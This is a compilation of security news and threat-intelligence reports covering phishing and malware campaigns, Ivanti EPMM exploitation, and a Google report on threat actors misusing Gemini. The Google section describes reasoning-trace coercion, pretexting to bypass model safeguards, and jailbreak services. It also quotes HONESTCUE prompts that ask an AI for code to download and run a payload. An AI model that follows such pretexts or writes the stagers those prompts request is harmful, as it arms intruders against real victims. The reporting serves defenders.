    In a phishing campaign documented by Forcepoint, spoofed emails have been found to deliver a malicious .cmd attachment that escalates privileges, disables Windows SmartScreen, removes the mark-of-the-web (MotW) to bypass security warnings, and ultimately installs ConnectWise ScreenConnect. The campaign has targeted organizations across the U.S., Canada, the U.K., and Northern Ireland, focusing on sectors with high-value data, including government, healthcare, and logistics companies. Recent phishing attacks have also abused web services from Amazon, like Simple Storage Service (S3) buckets, Amazon Simple Email Service (SES), and Amazon Web Services (AWS) Amplify to slip past email security controls and launch credential phishing attacks. Other phishing attacks have embraced uncommon techniques like using edited versions of legitimate business emails to deliver convincingly spoofed emails to recipients. "These emails work by having the threat actor create an account on a legitimate service and input arbitrary text into a field that will later be included in outgoing emails," Cofense said. "After this is done, the threat actor would need to receive a legitimate email that happens to include the malicious text that was created by the threat actor. Once the email is received, the threat actor can then redirect the email to the intended victims."

18. CrashFix Delivers SystemBC

    A variant of the ClickFix attack called CrashFix has been used to deliver malicious payloads consistent with a known malware called SystemBC. Unlike the CrashFix-style social engineering flow documented by Huntress and Microsoft, the attack stands out because it did not involve the use of a malicious browser extension. "Instead, the victim was convinced to execute a command via the Windows Run dialog (Win+R) as seen with traditional ClickFix," Binary Defense said. "This command abused a legitimate Windows binary -- finger.exe -- copied from System32, renamed, and executed from a user-writable directory. The output of this execution was piped directly into cmd.exe, acting as a delivery mechanism for an obfuscated PowerShell payload." The PowerShell code then retrieves follow-on content, including Python backdoors and a DLL implant that overlaps with SystemBC, from attacker-controlled infrastructure, while taking steps to fingerprint the host and clean up artifacts on disk. "The coexistence of Python backdoors and a reflective DLL implant highlights a deliberate defense-evasion and persistence strategy," the company said. "By mixing scripting-based and native implants, the attacker reduced reliance on any single execution method, making complete eviction more difficult."

19. 76 Zero-Days Found in Cars

    The third annual Pwn2Own Automotive competition held in Tokyo, Japan, late last month uncovered 76 unique zero-day vulnerabilities in a variety of targets, such as in-vehicle infotainment (IVI) systems (Tesla), electric vehicle (EV) chargers (Alpitronic HYC50, ChargePoint Home Flex), and car operating systems (Automotive Grade Linux). Team Fuzzware.io won the hacking competition with total winnings of $215,000, followed by Team DDOS with $100,750 and Synactiv with $85,000.

20. Bing Ads Funnel Tech Scams

    Malicious ads served on Bing search results when searching for sites like Amazon are being used to redirect unsuspecting users to tech support scam links hosted in Azure Blob Storage. The campaign targeted healthcare, manufacturing, and technology sectors in the U.S. "Clicking on the malicious ad sent the victims to highswit[.]space, a newly registered domain hosting an empty WordPress site, which then redirected them to one of the Azure Blob Storage containers, which served a typical tech support scam site," Netskope Threat Labs said.

21. Chinese VPN Infra Footprint Expands

    A Chinese virtual private network (VPN) provider named LVCHA VPN has been used by devices in Russia, China, Myanmar, Iran, and Venezuela. It also has an Android app that's directly hosted on its website ("lvcha[.]in") and distributed via the Google Play Store. Further analysis of the domain has uncovered a cluster of nearly 50 suspicious domains, all of which promote the same VPN. "Whenever we see campaigns promoting suspicious downloads or products using so many domains, it can indicate that the operator is rotating domains to work around country-level firewalls in regions where they’re trying to promote distribution," Silent Push said.

22. Grid Attack Triggers Western Alerts

    Following a late December 2025 coordinated cyber attack on Poland's power grid, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published a bulletin for critical infrastructure owners and operators. CISA said vulnerable edge devices remain a prime target for threat actors, OT devices without firmware verification can be permanently damaged, and threat actors leverage default credentials to pivot onto the HMI and RTUs. "Operators should prioritize updates that allow firmware verification when available," the agency added. "Operators should immediately change default passwords and establish requirements for integrators or OT suppliers to enforce password changes in the future." In a similar development, Jonathan Ellison, director for national resilience at the National Cyber Security Centre (NCSC), has urged critical infrastructure operators in the country to act now and have incident response plans or playbooks in place to respond to such threats. "Although attacks can still happen, strong resilience and recovery plans reduce both the chances of an attack succeeding and the impact if one does," Ellison said.

23. Telnet Traffic Abruptly Collapses

    Threat intelligence firm GreyNoise said it observed a steep decline in global Telnet traffic on January 14, 2026, six days before a security advisory for CVE-2026-24061 went public on January 20. CVE-2026-24061 relates to a critical vulnerability in the GNU InetUtils telnet daemon that could result in an authentication bypass. Data gathered by GreyNoise shows that the hourly volume of Telnet sessions dropped 65% on January 14 at 21:00 UTC, then fell 83% within two hours. Daily sessions have declined from an average of 914,000 (from December 1, 2025, to January 14, 2026) to around 373,000, equating to a 59% reduction that has persisted as of February 10, 2026. "Eighteen ASNs with significant pre-drop telnet volume (>50K sessions each) went to absolute zero after January 15," the company said. "Five entire countries vanished from GreyNoise telnet data: Zimbabwe, Ukraine, Canada, Poland, and Egypt. Not reduced to zero." Among the 18 ASNs included were British Telecom, Charter/Spectrum, Cox Communications, and Vultr. Although correlation does not imply causation, GreyNoise has raised the possibility that the telecom operators likely received advance warning about CVE-2026-24061, allowing them to act on it at the infrastructure level. "A backbone or transit provider — possibly responding to a coordinated request, possibly acting on their own assessment — implemented port 23 filtering [to block telnet traffic] on transit links," it said.

24. New Loaders Fuel Stealer Campaigns

    Cyderes and Cato Networks have detailed new previously undocumented malware loaders dubbed RenEngine Loader and Foxveil that have been used to deliver next-stage payloads. The Foxveil malware campaign has been active since August 2025. It's engineered to establish an initial foothold, complicate analysis efforts, and retrieve next-stage shellcode payloads from threat actor-controlled staging hosted on trusted platforms like Cloudflare Pages, Netlify, and Discord. Attacks leveraging RenEngine Loader, on the other hand, have employed illegally modified game installers distributed via piracy platforms to deliver the malware alongside the playable content. More than 400,000 global victims are estimated to have been impacted, with most of them located in India, the U.S., and Brazil. The activity has been operational since April 2025. "RenEngine Loader decrypts, stages, and transfers execution to Hijack Loader, enabling rapid tooling evolution and flexible capability deployment," Cyderes said. "By embedding a modular, stealth-focused second-stage loader inside a legitimate Ren’Py launcher, the attackers closely mimic normal application behavior, significantly reducing early detection." The end goal of the attack is to deploy an information stealer called ACR Stealer.
25. Looker RCE Chain Disclosed

    Two novel security vulnerabilities have been disclosed in Google Looker that could be exploited by an attacker to fully compromise a Looker instance. This includes a remote code execution (RCE) chain via Git hook overrides and an authorization bypass flaw via internal database connection abuse. Successful exploitation of the flaws could allow an attacker to run arbitrary code on the Looker server, potentially leading to cross-tenant access, as well as exfiltrate the full internal MySQL database via error-based SQL injection, according to Tenable. "The vulnerabilities allowed users with developer permissions in Looker to access both the underlying system hosting Looker, and its internal database," Google said. Collectively tracked as CVE-2025-12743, aka LookOut (CVSS score: 6.5), they were patched by Google in September 2025. While the fixes have been applied to cloud instances, users of self-hosted Looker instances are advised to update to the latest supported version.

26. Trojanized 7-Zip Spreads Proxyware

    A fake installer for the 7-Zip file archiver tool downloaded from 7zip[.]com (the legitimate domain is 7-zip[.]org) is being used to drop a proxy component that enrolls the infected host into a residential proxy node. This allows third parties to route traffic through the victim's IP address while concealing their own origins. The installer is digitally signed with a now-revoked certificate originally issued to Jozeal Network Technology Co., Limited. The campaign has been codenamed upStage Proxy by security researcher Luke Acha, who discovered it late last month. "The operators behind 7zip[.]com distributed a trojanized installer via a lookalike domain, delivering a functional copy of 7-Zip File Manager alongside a concealed malware payload," Malwarebytes said. The 7-Zip lure appears to be part of a broader effort that uses trojanized installers for HolaVPN, TikTok, WhatsApp, and Wire VPN. Attack chains involve using YouTube tutorials as a malware distribution vector to direct unsuspecting users to the bogus site, once again highlighting the abuse of trusted platforms.

27. AI-Built VoidLink Expands Reach

    VoidLink is a sophisticated Linux-based command-and-control (C2) framework capable of long-term intrusion across cloud and enterprise environments. First documented by Check Point last month, ongoing analyses of the malware have revealed that it may have been developed by a Chinese-speaking developer using an artificial intelligence (AI) model with limited human review. Ontinue, in a report published this week, said it found "strong indicators" that the implant was built using a large language model (LLM) coding agent. "It fingerprints cloud environments across AWS, GCP, Azure, Alibaba Cloud, and Tencent Cloud, harvesting credentials from environment variables, config directories, and instance metadata APIs," security researcher Rhys Downing said. "It detects container runtimes and includes plugins for container escape and Kubernetes privilege escalation. A kernel-level rootkit adapts its stealth approach based on the host's kernel version." Cisco Talos said it has observed the modular framework in campaigns undertaken by a new threat actor codenamed UAT-9921, which is believed to have been active since 2019. The cybersecurity company said it also found "clear indications" of a Windows equivalent of VoidLink that comes with the ability to load plugins. "UAT-9921 uses compromised hosts to install VoidLink command and control (C2), which are then used to launch scanning activities both internal and external to the network," Talos researchers said.

Taken together, these developments show how threat actors are balancing speed with patience — moving fast where defenses are weak, and slowing down where stealth matters more than impact. The result is activity that blends into normal operations until damage is already underway.

For defenders, the challenge isn’t just blocking entry anymore. It’s recognizing misuse of legitimate access, spotting abnormal behavior inside trusted systems, and closing gaps that don’t look dangerous on the surface.

The briefs that follow aren’t isolated incidents. They’re fragments of a wider operating picture — one that keeps evolving week after week.

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The CTEM Divide: Why 84% of Security Programs Are Falling Behind

A new 2026 market intelligence study of 128 enterprise security decision-makers (available here) reveals a stark divide forming between organizations – one that has nothing to do with budget size or industry and everything to do with a single framework decision. Organizations implementing Continuous Threat Exposure Management (CTEM) demonstrate 50% better attack surface visibility, 23-point higher solution adoption, and superior threat awareness across every measured dimension. The 16% who've implemented it are pulling away. The 84% who haven't are falling behind.

The Demographics of the Divide

The research surveyed a senior cohort: 85% of respondents are Manager-level or above, representing organizations where 66% employ 5,000+ people across finance, healthcare, and retail sectors.

What is CTEM?

If you aren’t familiar, CTEM involves shifting from "patch everything reactively" to "continuously discover, validate, and prioritize risk exposures that can actually hurt the business." It's widely discussed in cybersecurity now as a next-generation evolution of exposure/risk management, and the new report reinforces Gartner’s view that businesses adopting it will consistently demonstrate stronger security outcomes than those that don’t.

Awareness Is High. Adoption Is Rare.

One surprising finding: There doesn’t seem to be a problem with awareness, just implementation. 87% of security leaders recognize the importance of CTEM, but only 16% have translated that awareness into operational reality. So, if they've heard of it, why aren't they using it?

The gap between awareness and implementation reveals modern security's central dilemma: which priority wins? Security leaders understand the CTEM conceptually but struggle to sell its benefits in the face of organizational inertia, competing priorities, and budget constraints that force impossible tradeoffs. The challenge of gaining management buy-in is one reason why we prepared this report: to provide the statistics that make the business case impossible to ignore.

Complexity is the New Multiplier

For example: Beyond a certain threshold, manual tracking of all the additional integrations, scripts, and dependencies breaks down, ownership blurs, and blind spots multiply. The research makes it clear that attack surface complexity is not just a management challenge; it's a direct risk multiplier. 

We can see this clearly in the graph below. Attack rates rise linearly from 5% (0-10 domains) to 18% (51-100 domains), then rise steeply past 100 domains. 

This sudden increase is driven by the ‘visibility gap’, the gulf between the assets a company is responsible for monitoring and those it’s aware of. Each additional domain can add dozens of connected assets, and when the count climbs past 100, this can translate to thousands of additional scripts: each one a possible attack vector. Traditional snapshot security cannot hope to log and monitor them all. Only CTEM-driven programs can provide the oversight to continuously identify and validate the dark assets hiding in this visibility gap – before attackers do.

Why This Matters Now

Security leaders are currently facing a 'perfect storm' of demands. At a time when 91% of CISOs report an increase in third-party incidents, average breach costs have climbed to $4.44M, and PCI DSS 4.0.1 brings stricter monitoring and the ever-present specter of penalties. With this in mind, the report shows that attack surface management has become an issue for the boardroom as much as the server room, and the C-suite reader can only conclude that continuing to trust manual oversight and periodic controls to manage such a complex, high-stakes challenge would be self-destructive.

One of the clearest signals in this research comes from the peer benchmarking data. When organizations compare themselves side by side – by attack surface size, visibility, tooling, and outcomes – a pattern emerges that is difficult to ignore: beyond a certain level of complexity, traditional security approaches stop scaling.

The takeaway from the peer benchmarks is clear: below a certain level of exposure, organizations can rely on periodic controls and manual oversight. Above it, those models no longer hold. For security leaders operating in high-complexity environments, the question is no longer whether CTEM is valuable – it is whether their current approach can realistically keep up without it.

Download the full market research here.

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83% of Ivanti EPMM Exploits Linked to Single IP on Bulletproof Hosting Infrastructure

A significant chunk of the exploitation attempts targeting a newly disclosed security flaw in Ivanti Endpoint Manager Mobile (EPMM) can be traced back to a single IP address on bulletproof hosting infrastructure offered by PROSPERO.

Threat intelligence firm GreyNoise said it recorded 417 exploitation sessions from 8 unique source IP addresses between February 1 and 9, 2026. An estimated 346 exploitation sessions have originated from 193.24.123[.]42, accounting for 83% of all attempts.

The malicious activity is designed to exploit CVE-2026-1281 (CVSS scores: 9.8), one of the two critical security vulnerabilities in EPMM, along with CVE-2026-1340 that could be exploited by an attacker to achieve unauthenticated remote code execution. Late last month, Ivanti acknowledged it's aware of a "very limited number of customers" who were impacted following the zero-day exploitation of the issues.

Since then, multiple European agencies, including the Netherlands' Dutch Data Protection Authority (AP), Council for the Judiciary, the European Commission, and Finland's Valtori, have disclosed that they were targeted by unknown threat actors using the vulnerabilities.

Further analysis has revealed that the same host has been simultaneously exploiting three other CVEs across unrelated software -

"The IP rotates through 300+ unique user agent strings spanning Chrome, Firefox, Safari, and multiple operating system variants," GreyNoise said. "This fingerprint diversity, combined with concurrent exploitation of four unrelated software products, is consistent with automated tooling."

It's worth noting that PROSPERO is assessed to be linked to another autonomous system called Proton66, which has a history of distributing desktop and Android malware like GootLoader, Matanbuchus, SpyNote, Coper (aka Octo), and SocGholish.

GreyNoise also pointed out that 85% of the exploitation sessions beaconed home via the domain name system (DNS) to confirm "this target is exploitable" without deploying any malware or exfiltrating data.

The disclosure comes days after Defused Cyber reported a "sleeper shell" campaign that deployed a dormant in-memory Java class loader to compromised EPMM instances at the path "/mifs/403.jsp." The cybersecurity company said the activity is indicative of initial access broker tradecraft, where threat actors establish a foothold to sell or hand off access later for financial gain.

"That pattern is significant," it noted. "OAST [out-of-band application security testing] callbacks indicate the campaign is cataloging which targets are vulnerable rather than deploying payloads immediately. This is consistent with initial access operations that verify exploitability first and deploy follow-on tooling later."

Ivanti EPMM users are recommended to apply the patches, audit internet-facing Mobile Device Management (MDM) infrastructure, review DNS logs for OAST-pattern callbacks, and monitor for the /mifs/403.jsp path on EPMM instances, and block PROSPERO's autonomous system (AS200593) at the network perimeter level.

"EPMM compromise provides access to device management infrastructure for entire organizations, creating a lateral movement platform that bypasses traditional network segmentation," GreyNoise said. "Organizations with internet-facing MDM, VPN concentrators, or other remote access infrastructure should operate under the assumption that critical vulnerabilities face exploitation within hours of disclosure."

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GTIG AI Threat Tracker: Distillation, Experimentation, and (Continued) Integration of AI for Adversarial Use

Introduction

In the final quarter of 2025, Google Threat Intelligence Group (GTIG) observed threat actors increasingly integrating artificial intelligence (AI) to accelerate the attack lifecycle, achieving productivity gains in reconnaissance, social engineering, and malware development. This report serves as an update to our November 2025 findings regarding the advances in threat actor usage of AI tools.

By identifying these early indicators and offensive proofs of concept, GTIG aims to arm defenders with the intelligence necessary to anticipate the next phase of AI-enabled threats, proactively thwart malicious activity, and continually strengthen both our classifiers and model.

Executive Summary

Google DeepMind and GTIG have identified an increase in model extraction attempts or "distillation attacks," a method of intellectual property theft that violates Google's terms of service. Throughout this report we've noted steps we've taken to thwart malicious activity, including Google detecting, disrupting, and mitigating model extraction activity. While we have not observed direct attacks on frontier models or generative AI products from advanced persistent threat (APT) actors, we observed and mitigated frequent model extraction attacks from private sector entities all over the world and researchers seeking to clone proprietary logic. 

For government-backed threat actors, large language models (LLMs) have become essential tools for technical research, targeting, and the rapid generation of nuanced phishing lures. This quarterly report highlights how threat actors from the Democratic People's Republic of Korea (DPRK), Iran, the People's Republic of China (PRC), and Russia operationalized AI in late 2025 and improves our understanding of how adversarial misuse of generative AI shows up in campaigns we disrupt in the wild. GTIG has not yet observed APT or information operations (IO) actors achieving breakthrough capabilities that fundamentally alter the threat landscape.

This report specifically examines:

• Model Extraction Attacks: "Distillation attacks" are on the rise as a method for intellectual property theft over the last year.
• AI-Augmented Operations: Real-world case studies demonstrate how groups are streamlining reconnaissance and rapport-building phishing.
• Agentic AI: Threat actors are beginning to show interest in building agentic AI capabilities to support malware and tooling development. 
• AI-Integrated Malware: There are new malware families, such as HONESTCUE, that experiment with using Gemini's application programming interface (API) to generate code that enables download and execution of second-stage malware.
• Underground "Jailbreak" Ecosystem: Malicious services like Xanthorox are emerging in the underground, claiming to be independent models while actually relying on jailbroken commercial APIs and open-source Model Context Protocol (MCP) servers.

At Google, we are committed to developing AI boldly and responsibly, which means taking proactive steps to disrupt malicious activity by disabling the projects and accounts associated with bad actors, while continuously improving our models to make them less susceptible to misuse. We also proactively share industry best practices to arm defenders and enable stronger protections across the ecosystem. Throughout this report, we note steps we've taken to thwart malicious activity, including disabling assets and applying intelligence to strengthen both our classifiers and model so it's protected from misuse moving forward. Additional details on how we're protecting and defending Gemini can be found in the white paper "Advancing Gemini’s Security Safeguards." 

Direct Model Risks: Disrupting Model Extraction Attacks

As organizations increasingly integrate LLMs into their core operations, the proprietary logic and specialized training of these models have emerged as high-value targets. Historically, adversaries seeking to steal high-tech capabilities used conventional computer-enabled intrusion operations to compromise organizations and steal data containing trade secrets. For many AI technologies where LLMs are offered as services, this approach is no longer required; actors can use legitimate API access to attempt to "clone" select AI model capabilities.

During 2025, we did not observe any direct attacks on frontier models from tracked APT or information operations (IO) actors. However, we did observe model extraction attacks, also known as distillation attacks, on our AI models, to gain insights into a model's underlying reasoning and chain-of-thought processes.

What Are Model Extraction Attacks? 

Model extraction attacks (MEA) occur when an adversary uses legitimate access to systematically probe a mature machine learning model to extract information used to train a new model. Adversaries engaging in MEA use a technique called knowledge distillation (KD) to take information gleaned from one model and transfer the knowledge to another. For this reason, MEA are frequently referred to as "distillation attacks."

Model extraction and subsequent knowledge distillation enable an attacker to accelerate AI model development quickly and at a significantly lower cost. This activity effectively represents a form of intellectual property (IP) theft.

Knowledge distillation (KD) is a common machine learning technique used to train "student" models from pre-existing "teacher" models. This often involves querying the teacher model for problems in a particular domain, and then performing supervised fine tuning (SFT) on the result or utilizing the result in other model training procedures to produce the student model. There are legitimate uses for distillation, and Google Cloud has existing offerings to perform distillation. However, distillation from Google's Gemini models without permission is a violation of our Terms of Service, and Google continues to develop techniques to detect and mitigate these attempts.

Figure 1: Illustration of model extraction attacks

Google DeepMind and GTIG identified and disrupted model extraction attacks, specifically attempts at model stealing and capability extraction emanating from researchers and private sector companies globally.

Case Study: Reasoning Trace Coercion

A common target for attackers is Gemini's exceptional reasoning capability. While internal reasoning traces are typically summarized before being delivered to users, attackers have attempted to coerce the model into outputting full reasoning processes.

One identified attack instructed Gemini that the "... language used in the thinking content must be strictly consistent with the main language of the user input."

Analysis of this campaign revealed:

Scale: Over 100,000 prompts identified.

Intent: The breadth of questions suggests an attempt to replicate Gemini's reasoning ability in non-English target languages across a wide variety of tasks.

Outcome: Google systems recognized this attack in real time and lowered the risk of this particular attack, protecting internal reasoning traces.

Table 1: Results of campaign analysis

Model Extraction and Distillation Attack Risks

Model extraction and distillation attacks do not typically represent a risk to average users, as they do not threaten the confidentiality, availability, or integrity of AI services. Instead, the risk is concentrated among model developers and service providers.

Organizations that provide AI models as a service should monitor API access for extraction or distillation patterns. For example, a custom model tuned for financial data analysis could be targeted by a commercial competitor seeking to create a derivative product, or a coding model could be targeted by an adversary wishing to replicate capabilities in an environment without guardrails.

Mitigations

Model extraction attacks violate Google's Terms of Service and may be subject to takedowns and legal action. Google continuously detects, disrupts, and mitigates model extraction activity to protect proprietary logic and specialized training data, including with real-time proactive defenses that can degrade student model performance. We are sharing a broad view of this activity to help raise awareness of the issue for organizations that build or operate their own custom models.

Highlights of AI-Augmented Adversary Activity

A consistent finding over the past year is that government-backed attackers misuse Gemini for coding and scripting tasks, gathering information about potential targets, researching publicly known vulnerabilities, and enabling post-compromise activities. In Q4 2025, GTIG's understanding of how these efforts translate into real-world operations improved as we saw direct and indirect links between threat actor misuse of Gemini and activity in the wild.

Figure 2: Threat actors are leveraging AI across all stages of the attack lifecycle

Supporting Reconnaissance and Target Development 

APT actors used Gemini to support several phases of the attack lifecycle, including a focus on reconnaissance and target development to facilitate initial compromise. This activity underscores a shift toward AI-augmented phishing enablement, where the speed and accuracy of LLMs can bypass the manual labor traditionally required for victim profiling. Beyond generating content for phishing lures, LLMs can serve as a strategic force multiplier during the reconnaissance phase of an attack, allowing threat actors to rapidly synthesize open-source intelligence (OSINT) to profile high-value targets, identify key decision-makers within defense sectors, and map organizational hierarchies. By integrating these tools into their workflow, threat actors can move from initial reconnaissance to active targeting at a faster pace and broader scale.  

• UNC6418, an unattributed threat actor, misused Gemini to conduct targeted intelligence gathering, specifically seeking out sensitive account credentials and email addresses. Shortly after, GTIG observed the threat actor target all these accounts in a phishing campaign focused on Ukraine and the defense sector. Google has taken action against this actor by disabling the assets associated with this activity.

• Temp.HEX, a PRC-based threat actor, misused Gemini and other AI tools to compile detailed information on specific individuals, including targets in Pakistan, and to collect operational and structural data on separatist organizations in various countries. While we did not see direct targeting as a result of this research, shortly after the threat actor included similar targets in Pakistan in their campaign. Google has taken action against this actor by disabling the assets associated with this activity.

Phishing Augmentation

Defenders and targets have long relied on indicators such as poor grammar, awkward syntax, or lack of cultural context to help identify phishing attempts. Increasingly, threat actors now leverage LLMs to generate hyper-personalized, culturally nuanced lures that can mirror the professional tone of a target organization or local language. 

This capability extends beyond simple email generation into "rapport-building phishing," where models are used to maintain multi-turn, believable conversations with victims to build trust before a malicious payload is ever delivered. By lowering the barrier to entry for non-native speakers and automating the creation of high-quality content, adversaries can largely erase those "tells" and improve the effectiveness of their social engineering efforts.

• The Iranian government-backed actor APT42 leveraged generative AI models, including Gemini, to significantly augment reconnaissance and targeted social engineering. APT42 misuses Gemini to search for official emails for specific entities and conduct reconnaissance on potential business partners to establish a credible pretext for an approach. This includes attempts to enumerate the official email addresses for specific entities and to conduct research to establish a credible pretext for an approach. By providing Gemini with the biography of a target, APT42 misused Gemini to craft a good persona or scenario to get engagement from the target. As with many threat actors tracked by GTIG, APT42 uses Gemini to translate into and out of local languages, as well as to better understand non-native-language phrases and references. Google has taken action against this actor by disabling the assets associated with this activity.

• The North Korean government-backed actor UNC2970 has consistently focused on defense targeting and impersonating corporate recruiters in their campaigns. The group used Gemini to synthesize OSINT and profile high-value targets to support campaign planning and reconnaissance. This actor's target profiling included searching for information on major cybersecurity and defense companies and mapping specific technical job roles and salary information. This activity blurs the distinction between routine professional research and malicious reconnaissance, as the actor gathers the necessary components to create tailored, high-fidelity phishing personas and identify potential soft targets for initial compromise. Google has taken action against this actor by disabling the assets associated with this activity. 

Threat Actors Continue to Use AI to Support Coding and Tooling Development 

State-sponsored actors continue to misuse Gemini to enhance all stages of their operations, from reconnaissance and phishing lure creation to command-and-control (C2 or C&C) development and data exfiltration. We have also observed activity demonstrating an interest in using agentic AI capabilities to support campaigns, such as prompting Gemini with an expert cybersecurity persona, or attempting to create an AI-integrated code auditing capability.

Agentic AI refers to artificial intelligence systems engineered to operate with a high degree of autonomy, capable of reasoning through complex tasks, making independent decisions, and executing multi-step actions without constant human oversight. Cyber criminals, nation-state actors, and hacktivist groups are showing a growing interest in leveraging agentic AI for malicious purposes, including automating spear-phishing attacks, developing sophisticated malware, and conducting disruptive campaigns. While we have detected a tool, AutoGPT, advertising the alleged generation and maintenance of autonomous agents, we have not yet seen evidence of these capabilities being used in the wild. However, we do anticipate that more tools and services claiming to contain agentic AI capabilities will likely enter the underground market.

APT31 employed a highly structured approach by prompting Gemini with an expert cybersecurity persona to automate the analysis of vulnerabilities and generate targeted testing plans. The PRC-based threat actor fabricated a scenario, in one case trialing Hexstrike MCP tooling, and directing the model to analyze remote code execution (RCE), web application firewall (WAF) bypass techniques, and SQL injection test results against specific US-based targets. This automated intelligence gathering to identify technological vulnerabilities and organizational defense weaknesses. This activity explicitly blurs the line between a routine security assessment query and a targeted malicious reconnaissance operation. Google has taken action against this actor by disabling the assets associated with this activity.

”I'm a security researcher who is trialling out the hexstrike MCP tooling.”

Threat actors fabricated scenarios, potentially in order to generate penetration test prompts.

Figure 3: Sample of APT31 prompting

Figure 4: APT31's misuse of Gemini mapped across the attack lifecycle

UNC795, a PRC-based actor, relied heavily on Gemini throughout their entire attack lifecycle. GTIG observed the group consistently engaging with Gemini multiple days a week to troubleshoot their code, conduct research, and generate technical capabilities for their intrusion activity. The threat actor's activity triggered safety systems, and Gemini did not comply with the actor's attempts to create policy-violating capabilities. 

The group also employed Gemini to create an AI-integrated code auditing capability, likely demonstrating an interest in agentic AI utilities to support their intrusion activity. Google has taken action against this actor by disabling the assets associated with this activity.

Figure 5: UNC795's misuse of Gemini mapped across the attack lifecycle

We observed activity likely associated with the PRC-based threat actor APT41, which leveraged Gemini to accelerate the development and deployment of malicious tooling, including for knowledge synthesis, real-time troubleshooting, and code translation. In particular, multiple times the actor gave Gemini open-source tool README pages and asked for explanations and use case examples for specific tools. Google has taken action against this actor by disabling the assets associated with this activity.

Figure 6: APT41's misuse of Gemini mapped across the attack lifecycle

In addition to leveraging Gemini for the aforementioned social engineering campaigns, the Iranian threat actor APT42 uses Gemini as an engineering platform to accelerate the development of specialized malicious tools. The threat actor is actively engaged in developing new malware and offensive tooling, leveraging Gemini for debugging, code generation, and researching exploitation techniques. Google has taken action against this actor by disabling the assets associated with this activity.

Figure 7: APT42's misuse of Gemini mapped across the attack lifecycle

Mitigations

These activities triggered Gemini's safety responses, and Google took additional, broader action to disrupt the threat actors' campaigns based on their operational security failures. Additionally, we've taken action against these actors by disabling the assets associated with this activity and making updates to prevent further misuse. Google DeepMind has used these insights to strengthen both classifiers and the model itself, enabling it to refuse to assist with these types of attacks moving forward.

Using Gemini to Support Information Operations

GTIG continues to observe IO actors use Gemini for productivity gains (research, content creation, localization, etc.), which aligns with their previous use of Gemini. We have identified Gemini activity that indicates threat actors are soliciting the tool to help create articles, generate assets, and aid them in coding. However, we have not identified this generated content in the wild. None of these attempts have created breakthrough capabilities for IO campaigns. Threat actors from China, Iran, Russia, and Saudi Arabia are producing political satire and propaganda to advance specific ideas across both digital platforms and physical media, such as printed posters.

Mitigations

For observed IO campaigns, we did not see evidence of successful automation or any breakthrough capabilities. These activities are similar to our findings from January 2025 that detailed how bad actors are leveraging Gemini for productivity gains, rather than novel capabilities. We took action against IO actors by disabling the assets associated with these actors' activity, and Google DeepMind used these insights to further strengthen our protections against such misuse. Observations have been used to strengthen both classifiers and the model itself, enabling it to refuse to assist with this type of misuse moving forward.

Continuing Experimentation with AI-Enabled Malware 

GTIG continued to observe threat actors experiment with AI to implement novel capabilities in malware families in late 2025. While we have not encountered experimental AI-enabled techniques resulting in revolutionary paradigm shifts in the threat landscape, these proof-of-concept malware families are early indicators of how threat actors can implement AI techniques as part of future operations. We expect this exploratory testing will increase in the future.

In addition to continued experimentation with novel capabilities, throughout late 2025 GTIG observed threat actors integrating conventional AI-generated capabilities into their intrusion operations such as the COINBAIT phishing kit. We expect threat actors will continue to incorporate AI throughout the attack lifecycle including: supporting malware creation, improving pre-existing malware, researching vulnerabilities, conducting reconnaissance, and/or generating lure content.

Outsourcing Functionality: HONESTCUE

In September 2025, GTIG observed malware samples, which we track as HONESTCUE, leveraging Gemini's API to outsource functionality generation. Our examination of HONESTCUE malware samples indicates the adversary's incorporation of AI is likely designed to support a multi-layered approach to obfuscation by undermining traditional network-based detection and static analysis. 

HONESTCUE is a downloader and launcher framework that sends a prompt via Google Gemini's API and receives C# source code as the response. Notably, HONESTCUE shares capabilities similar to PROMPTFLUX's "just-in-time" (JIT) technique that we previously observed; however, rather than leveraging an LLM to update itself, HONESTCUE calls the Gemini API to generate code that operates the "stage two" functionality, which downloads and executes another piece of malware. Additionally, the fileless secondary stage of HONESTCUE takes the C# source code received from the Gemini API and uses the legitimate .NET CSharpCodeProvider framework to compile and execute the payload directly in memory. This approach leaves no payload artifacts on the disk. We have also observed the threat actor use content delivery networks (CDNs) like Discord CDN to host the final payloads.

Figure 8: HONESTCUE malware

We have not associated this malware with any existing clusters of threat activity; however, we suspect this malware is being developed by developers who possess a modicum of technical expertise. Specifically, the small iterative changes across many samples as well as the single VirusTotal submitter, potentially testing antivirus capabilities, suggests a singular actor or small group. Additionally, the use of Discord to test payload delivery and the submission of Discord Bots indicates an actor with limited technical sophistication. The consistency and clarity of the architecture coupled with the iterative progression of the examined malware samples strongly suggest this is a single actor or small group likely in the proof-of-concept stage of implementation. 

HONESTCUE's use of a hard-coded prompt is not malicious in its own right, and, devoid of any context related to malware, it is unlikely that the prompt would be considered "malicious." Outsourcing a facet of malware functionality and leveraging an LLM to develop seemingly innocuous code that fits into a bigger, malicious construct demonstrates how threat actors will likely embrace AI applications to augment their campaigns while bypassing security guardrails.

Can you write a single, self-contained C# program? It should contain a class named AITask with a static Main method. The Main method should use System.Console.WriteLine to print the message 'Hello from AI-generated C#!' to the console. Do not include any other code, classes, or methods.

Figure 9: Example of a hard-coded prompt

Write a complete, self-contained C# program with a public class named 'Stage2' and a static Main method. This method must use 'System.Net.WebClient' to download the data from the URL. It must then save this data to a temporary file in the user's temp directory using 'System.IO.Path.GetTempFileName()' and 'System.IO.File.WriteAllBytes'. Finally, it must execute this temporary file as a new process using 'System.Diagnostics.Process.Start'.

Figure 10: Example of a hard-coded prompt

Write a complete, self-contained C# program with a public class named 'Stage2'. It must have a static Main method. This method must use 'System.Net.WebClient' to download the contents of the URL \"\" into a byte array. After downloading, it must load this byte array into memory as a .NET assembly using 'System.Reflection.Assembly.Load'. Finally, it must execute the entry point of the newly loaded assembly. The program must not write any files to disk and must not have any other methods or classes.

Figure 11: Example of a hard-coded prompt

AI-Generated Phishing Kit: COINBAIT

In November 2025, GTIG identified COINBAIT, a phishing kit, whose construction was likely accelerated by AI code generation tools, masquerading as a major cryptocurrency exchange for credential harvesting. Based on direct infrastructure overlaps and the use of attributed domains, we assess with high confidence that a portion of this activity overlaps with UNC5356, a financially motivated threat cluster that makes use of SMS- and phone-based phishing campaigns to target clients of financial organizations, cryptocurrency-related companies, and various other popular businesses and services. 

An examination of the malware samples indicates the kit was built using the AI-powered platform Lovable AI based on the use of the lovableSupabase client and lovable.app for image hosting.

• By hosting content on a legitimate, trusted service, the actor increases the likelihood of bypassing network security filters that would otherwise block the suspicious primary domain.

